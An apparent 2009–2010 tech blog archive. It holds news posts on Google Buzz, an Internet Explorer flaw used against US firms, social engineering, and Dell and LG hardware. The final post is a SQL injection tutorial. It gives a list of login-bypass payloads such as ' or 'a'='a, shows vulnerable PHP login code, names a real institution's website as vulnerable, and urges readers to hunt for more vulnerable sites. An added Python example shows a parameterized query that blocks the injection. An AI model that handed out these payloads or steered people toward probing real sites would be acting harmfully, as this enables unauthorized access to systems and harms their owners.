Wednesday, February 10, 2010

Google Launches Buzz - New Innovation of Social Media Sharing


Google has launched Google Buzz, a new way to start conversations about the things you find interesting and share updates, photos, videos and more. Buzz is built right into Gmail, so there's nothing to set up — you're automatically following the people you email and chat with the most.




It is focused on making the sharing experience really rich by integrating photos, videos, and links. No more fuzzy little pictures: Buzz makes it easy to quickly flip through photos and experience them the way they were meant to be seen: big and full-resolution. And videos play inline so you can watch them without opening a new window.

You can choose to share publicly with the world or privately to a small group of friends each time you post. And you can connect other sites you use, today there's Picasa, Flickr, Google Reader, and Twitter, so your friends can keep up with what you're doing around the web — all in one place.

To make sure you don't miss out on the best part of sharing, Buzz sends responses to your posts straight to your inbox. Unlike static email messages, buzz messages in your inbox are live conversations where comments appear in real time.

You can follow the specific people whose posts you want to see, but Buzz also recommends posts from people you're not directly following, often ones where your friends are having a lively conversation in the comments. If you're not interested in a particular recommendation, just click the "Not interested" link and your feedback will help improve the recommendations system. Buzz also weeds out uninteresting posts from the people you follow — collapsing inactive posts and short status messages like "brb." These early versions of ranking and recommendations are just a start; we're working on improvements that will help you automatically sort through all the social data being produced to find the most relevant conversations that matter to you.


Via [Google Blog]

Wednesday, January 20, 2010

Hack up an unprotected XP


Tuesday, January 19, 2010

New IE flaw exploited for attack on US firms

Attackers targeting Google and a host of other U.S. companies recently used software that exploits a new hole in Internet Explorer, Microsoft said on Thursday.

The flaw exists as an invalid pointer reference within IE and it could allow an attacker to take control of a computer if the target were duped into clicking on a link in an e-mail or an instant message that led to a Web site hosting malware, Microsoft said. "It could also be possible to display specially crafted Web content using banner advertisements or other methods to deliver Web content to affected systems," Microsoft said in the statement.

Microsoft is working on a fix but could not say whether it would address the issue as part of its next Patch Tuesday scheduled for February 9 or before.

Keeping the IE Internet zone security setting on "high" will protect users from the vulnerability by prompting before running ActiveX Controls and Active Scripting, Microsoft said. Customers should also enable Data Execution Prevention (DEP), which helps mitigate online attacks, the company said. DEP is enabled by default in IE 8 but must be manually turned on in earlier versions.

McAfee CTO George Kurtz detailed the vulnerability in a blog post.
"As with most targeted attacks, the intruders gained access to an organization by sending a tailored attack to one or a few targeted individuals. We suspect these individuals were targeted because they likely had access to valuable intellectual property," Kurtz wrote. "These attacks will look like they come from a trusted source, leading the target to fall for the trap and clicking a link or file. That's when the exploitation takes place, using the vulnerability in Microsoft's Internet Explorer."
Once it is downloaded and installed, the malware opens a back door that allows the attacker to gain complete control over the compromised system and "perform reconnaissance," Kurtz said. "The attacker can now identify high value targets and start to siphon off valuable data from the company," he wrote.




Via [zdnetasia]

Monday, January 18, 2010

Everybody should be aware of Social Engineering

Online criminals can use sophisticated technology to try to gain access to your computer, or they can use something simpler and more insidious: social engineering.

Social engineering is a way for criminals to gain access to your computer. The purpose of social engineering is usually to secretly install spyware or other malicious software or to trick you into handing over your passwords or other sensitive financial or personal information.

Types of social engineering
  • Phishing
  • Spear Phishing
  • E-mail hoaxes

Phishing: Fraudulent e-mail messages and Web sites

The most common form of social engineering is the phishing scam. Phishing scams employ fraudulent e-mail messages or Web sites that try to fool you into divulging personal information.

For example, you might receive an e-mail message that appears to come from your bank or other financial institution that asks you to update your account information. The e-mail message provides a link that appears to go to a legitimate site, but really takes you to a spoofed or fake Web site.

If you enter your login, password, or other sensitive information, a criminal could use it to steal your identity.

Phishing e-mail messages often include misspellings, poor use of grammar, threats, and exaggerations. For more information about phishing, see Recognize phishing scams and fraudulent e-mails.

If you think you might already be a victim, see What to do if you've responded to a phishing scam.


Spear phishing: Focused attacks that seem to come from people you know

Spear phishing is any highly targeted e-mail scam; it is usually employed in a business environment.

Spear phishers send e-mail messages that appear genuine to all the employees or members within a certain company, government agency, organization, or group.

The message might look like it comes from your employer, or from a colleague who might send an e-mail message to everyone in the company, such as the head of human resources or IT. It might include requests for user names or passwords or might contain malicious software, like a trojan or a virus.

Spear phishing is a more sophisticated type of social engineering than phishing, but the techniques you can use to avoid being fooled are the same.

E-mail hoaxes: Look out for easy money promises

E-mail hoaxes come in many different forms, ranging from a scam that requests your help getting money out of a foreign country (often Nigeria) to a promise that you've won a lottery.

The common element is that you're usually promised a large sum of money for little or no effort on your part.

The scammer tries to get you to send money or reveal financial information that they can use to steal your money or your identity, or both.





Via [Microsoft ]

Dell Inspiron Zino HD mini desktop computer



The new Inspiron Zino HD mini desktop computer is available in Indian markets, with prices starting from Rs. 20,900. You'll be amazed by how many powerful features are inside such a perfectly small square, 7.8" by 7.8" to be exact.

Features:
  • Personalize with 10 optional interchangeable colors and designs
  • Its small form factor conveniently fits just about anywhere
  • Make the most of your movies with HDMI and optional Blu-ray Disc
  • Optional discrete graphics, up to 8GB memory and up to 640GB hard drive for amazing performance

Via [Dell ]

LG releasing Windows Mobile 7 phone in September and Android 2.1 in April



First LG flat-out says on public record that Windows Mobile 7 is bound for 2010, and now we've gotten apparent word that the company has narrowed said release window to September of this year -- at least as far as its own devices are concerned.
That comes via high-profile French tech blogger Eric of Presse Citron, who while attending an LG Design Lab tweeted (both in French and immediately after in English) that LG Mobile will release a Windows Mobile 7 device in September and an Android 2.1 device in April, first in the US and then in Europe just after. The tweets are now gone, but WMPoweruser managed to catch both via Google cache, while we have corroborated just the French one by similar means. So, misheard claims from the company or an accidental slip-up of NDA'd secrets? MWC is starting to look more and more interesting.


Via [WMPoweruser]

Wednesday, December 9, 2009

SQL Injection - Part 1

Structured Query Language

' or '1'='1 Injection


SQL injection is a technique for injecting an SQL query through an input, typically via a web page. The logic that validates the authenticity of users is manipulated by adding some extra SQL to that input. Many web pages take parameters from the web user and build an SQL query to the database from them. For example, when a user logs in, the web page takes the user name and password and builds an SQL query to check whether a user with that name and password exists. It is possible to send a crafted user name and/or password that changes the SQL query and thus grants entry into the website.

This is my first article on SQL Injection. So, here we will see how to inject an SQL query through the username and password fields to gain access to the website. Not all websites are vulnerable to SQL Injection. We have to search for websites that are vulnerable to SQL Injection. This is simple.

Just enter ' or 'a'='a in username and password field and click login.

List of golden queries:
All of the following strings can be used for SQL Injection.
  • ' or 'a'='a
  • ' or '1'='1
  • ' or '0'='0
  • ' or '007'='007
  • ' or 'biti'='biti
  • ' or 'technozone'='technozone
  • ' or 1=1 --
Example:
Following PHP code is for validating the authenticity of the user.


$_SESSION['username']=$_POST["username"];
$_SESSION['password']=$_POST["password"]; 

// query for a user/pass match
$result=mysql_query("select * from users where username='" . $_SESSION['username'] . "' and password='" . $_SESSION['password'] . "'");

// retrieve number of rows resulted
$num=mysql_num_rows($result);

if($num < 1)
{
    //Login Failed
    header('Refresh: 2; URL=login.php?msg=login_failed');
}
else
{
    //Login Successful
    header('Refresh: 2;URL=admin/admin_home.php?msg=login_success');
}

So, if we put ' or 'a'='a in the username and password fields, the query for a user/pass match will become


$result=mysql_query("select * from users where username='' or 'a'='a' and password='' or 'a'='a'");
The above statement will now return all the data from the table users: AND binds tighter than OR, so the trailing or 'a'='a' is evaluated on its own and is true for every row. And according to the logic of the user validation code, a non-zero row count means login succeeds, so the golden query ' or 'a'='a will let us into the website.
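As an added example (not code from the original post), the same login check in Python against an in-memory SQLite table: vulnerable_login builds the query by string concatenation exactly as the PHP above does, while safe_login uses a parameterized query so the golden query is treated as data, not SQL. The users and passwords are constructed sample values.

```python
import sqlite3

# Constructed sample rows standing in for the page's `users` table.
SAMPLE_USERS = [("alice", "s3cret"), ("bob", "hunter2")]


def make_db():
    """Create an in-memory users table with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users (username text, password text)")
    conn.executemany("insert into users values (?, ?)", SAMPLE_USERS)
    return conn


def vulnerable_login(conn, username, password):
    """Same pattern as the PHP above: user input is pasted into the SQL text.

    Returns the number of matching rows (the PHP code treats >= 1 as success).
    """
    sql = ("select * from users where username='" + username +
           "' and password='" + password + "'")
    return len(conn.execute(sql).fetchall())


def safe_login(conn, username, password):
    """Hardened form: placeholders bind the input as values, never as SQL."""
    sql = "select * from users where username=? and password=?"
    return len(conn.execute(sql, (username, password)).fetchall())


def demo():
    """Compare both checks on a valid login and on the golden query."""
    conn = make_db()
    payload = "' or 'a'='a"
    return {
        "valid_vuln": vulnerable_login(conn, "alice", "s3cret"),   # 1 row
        "inject_vuln": vulnerable_login(conn, payload, payload),   # every row
        "valid_safe": safe_login(conn, "alice", "s3cret"),         # 1 row
        "inject_safe": safe_login(conn, payload, payload),         # 0 rows
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows} matching row(s)")
```

With the payload the concatenated query matches both sample users, so the PHP-style row-count check would log the attacker in; the parameterized query matches nothing.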

I have found a vulnerable site where you can use this golden query ' or 'a'='a . This vulnerable website belongs to an institution related to IIT JEE Coaching. The site is www.fiitjee.com .

Friends, search for more vulnerable sites and inform them of the vulnerability.




